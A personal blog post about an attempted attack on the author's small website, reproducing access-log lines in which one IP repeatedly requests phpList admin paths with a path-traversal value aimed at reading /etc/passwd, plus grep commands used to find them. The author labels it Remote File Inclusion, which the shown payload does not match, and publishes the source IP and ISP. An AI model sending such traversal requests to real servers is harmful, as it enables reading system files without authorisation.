Tag Archives: Www Logs

Attempted Hack on My Site?! Really?!

Exponentially increased traffic?
Exponentially increased traffic?

So I logged in to my site today and noticed my traffic had spiked exponentially! Check out the screenshot of the bar graph (showing yesterday and today for comparison). 300 visitors and 3000 pageviews in a single day? On my humble little website? Way too good to be true!

So I looked further and found some unsettling info in the visitor statistics… It looked something like this:

14:38:08 //lists/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
14:38:09 //newsletter/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
14:38:10 //news/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
14:38:10 //phplist/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
14:38:11 //phpList/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
14:38:12 //admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
14:38:13 //phplist/lsts/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
14:38:14 //phplists/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
14:38:14 //list/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd

Looks like someone was trying to pull a RFI — Remote File Inclusion — attack on my site…

Next I checked my logs:

cat /var/www/logs/*.log | grep '\.\.\/\.\.\/' > /tmp/rfi_attack.log
cat /var/www/logs/*.log | grep 'SERVERQDOCUMENT' > /tmp/rfi_attack.log
cat /var/www/logs/*.log | grep 'DOCUMENT_ROOT' > /tmp/rfi_attack.log
cat /var/www/logs/*.log | grep '\.txt??' > /tmp/rfi_attack.log

and here’s the output:

193.158.67.223 - - [24/Feb/2011:14:38:08 -0700] "GET //lists/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 301 680 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
193.158.67.223 - - [24/Feb/2011:14:38:09 -0700] "GET //newsletter/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 301 685 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
193.158.67.223 - - [24/Feb/2011:14:38:10 -0700] "GET //news/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 301 679 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
193.158.67.223 - - [24/Feb/2011:14:38:10 -0700] "GET //phplist/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 301 682 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
193.158.67.223 - - [24/Feb/2011:14:38:11 -0700] "GET //phpList/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 301 682 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
193.158.67.223 - - [24/Feb/2011:14:38:12 -0700] "GET //admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 301 674 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
193.158.67.223 - - [24/Feb/2011:14:38:13 -0700] "GET //phplist/lsts/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 301 687 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
193.158.67.223 - - [24/Feb/2011:14:38:14 -0700] "GET //phplists/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 301 683 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
193.158.67.223 - - [24/Feb/2011:14:38:14 -0700] "GET //list/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 301 673 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

So it looks like this is the only attack (at least the only one of this type)… I ran some scripts to see if the hacker was able to access and modify any files, but everything came back negative. So for now I am going to try to rest easy and let this one go. I have no idea why anyone would bother messing with my site as they really don’t stand to gain anything, but life is full of stupid people. Right?

I would like to assume that the hacker was at least smart enough to work through a proxy, but I also don’t want to overestimate him either… so here are a few neat images with info attached to the hacker’s IP address, just for fun… but first here are a few links for further reading on RFI attacks how to protect against them and how to check your logs to see if someone was performing one on you

 

193.158.67.223 tried to hack me?
193.158.67.223 tried to hack me?
Look 193.158.67.223 is from Germany!
Look 193.158.67.223 is from Germany!
Look here's his ISP and domain!
Look here's his ISP and domain!